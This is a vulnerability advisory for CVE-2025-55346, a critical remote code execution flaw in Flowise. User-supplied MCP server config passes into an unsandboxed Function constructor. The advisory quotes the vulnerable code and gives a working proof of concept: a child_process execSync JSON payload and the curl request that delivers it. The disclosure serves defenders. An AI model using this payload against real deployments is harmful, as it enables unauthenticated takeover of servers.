Flowise vulnerable to RCE via Dynamic function constructor injection

CVE-2025-55346 → View on GitHub ↗ View on CVE.org ↗ View on NVD ↗

Description

Summary

User-controlled input flows to an unsafe implementaion of a dynamic Function constructor , allowing a malicious actor to run JS code in the context of the host (not sandboxed) leading to RCE.

Details

When creating a new Custom MCP Chatflow in the platform, the MCP Server Config displays a placeholder hinting at an example of the expected input structure:

{
    "command": "npx",
    "args": ["-y", "@modelcontextprotocol/server-filesystem", "/path/to/allowed/files"]
}

Behind the scene, a POST request to /api/v1/node-load-method/customMCP is sent with the provided MCP Server Config, with additional parameters (excluded for brevity):

{
...SNIP...

   "inputs":{
      "mcpServerConfig":{
         "command":"npx",
         "args":[
            "-y",
            "@modelcontextprotocol/server-filesystem",
            "/path/to/allowed/files"
         ]
      }
   },
   "loadMethod":"listActions"

...SNIP...
}

Sending the same request with the parameter mcpServerConfig equals to a plain value and not an object, for example:

{
   "inputs":{
      "mcpServerConfig":"test"
   },
   "loadMethod":"listActions"
}

We enter an interesting code flow that leads to a function named convertValidJSONString (Line 103):
https://github.com/FlowiseAI/Flowise/blob/416e57380ea7ce2e66f89aded61b249ff3eef3b2/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L103

async getTools(nodeData: INodeData): Promise<Tool[]> {
        const mcpServerConfig = nodeData.inputs?.mcpServerConfig as string

        if (!mcpServerConfig) {
            throw new Error('MCP Server Config is required')
        }

        try {
            let serverParams
            if (typeof mcpServerConfig === 'object') {
                serverParams = mcpServerConfig
            } else if (typeof mcpServerConfig === 'string') {
                const serverParamsString = convertToValidJSONString(mcpServerConfig) <--
                serverParams = JSON.parse(serverParamsString)
            }

            const toolkit = new MCPToolkit(serverParams, 'stdio')
            await toolkit.initialize()

            const tools = toolkit.tools ?? []

            return tools as Tool[]
        } catch (error) {
            throw new Error(`Invalid MCP Server Config: ${error}`)
        }
    }
}

Here, the value of inputString originating from mcpServerConfig is being concatenated to a dynamic Function constructor that evaluates the provided value similar to using eval:

function convertToValidJSONString(inputString: string) {
    try {
        const jsObject = Function('return ' + inputString)()
        return JSON.stringify(jsObject, null, 2)
    } catch (error) {
        console.error('Error converting to JSON:', error)
        return ''
    }
}

This JS code runs in the context of the host, not sandboxed using @flowiseai/nodevm like other code execution functionalities within the platform.

This enables access to the global process object and as a result access to all the native NodeJS modules available such as child_process, leading to Remote Code Execution.

{
    "inputs":{
        "mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"
        },
    "loadMethod":"listActions"
}

PoC

  1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as npx, pnpm, etc):
    https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker

  2. Create a new file named payload.json somewhere in your machine, with the following data:

{"inputs":{"mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"},
"loadMethod":"listActions"}
  1. Send the following curl request using the payload.json file created above with the following command:
curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data @payload.json "http://localhost:3000/api/v1/node-load-method/customMCP"
  1. Observe that a new file named yofitofi is created under /tmp folder.

Impact

Remote code execution

Credit

The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.

Basic information

Type
reviewed
Severity
critical
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2025-10-06 14:08:45 UTC
Updated
2025-10-06 14:08:46 UTC
GitHub reviewed
2025-10-06 14:08:45 UTC

EPSS Score

Score Percentile
0.03% 8.41%

CVSS Scores

Base score Version Severity Vector
9.8 3.0
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

Type Value
GHSA GHSA-hmgh-466j-fx4c ↗
CVE CVE-2025-55346 ↗

CWEs

CWE id Name
CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
CWE-627 Dynamic Variable Evaluation

Credits

  • assaf-levkovich-jf (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm flowise <= 2.2.7-patch.1

References

cvelogic Threat Intelligence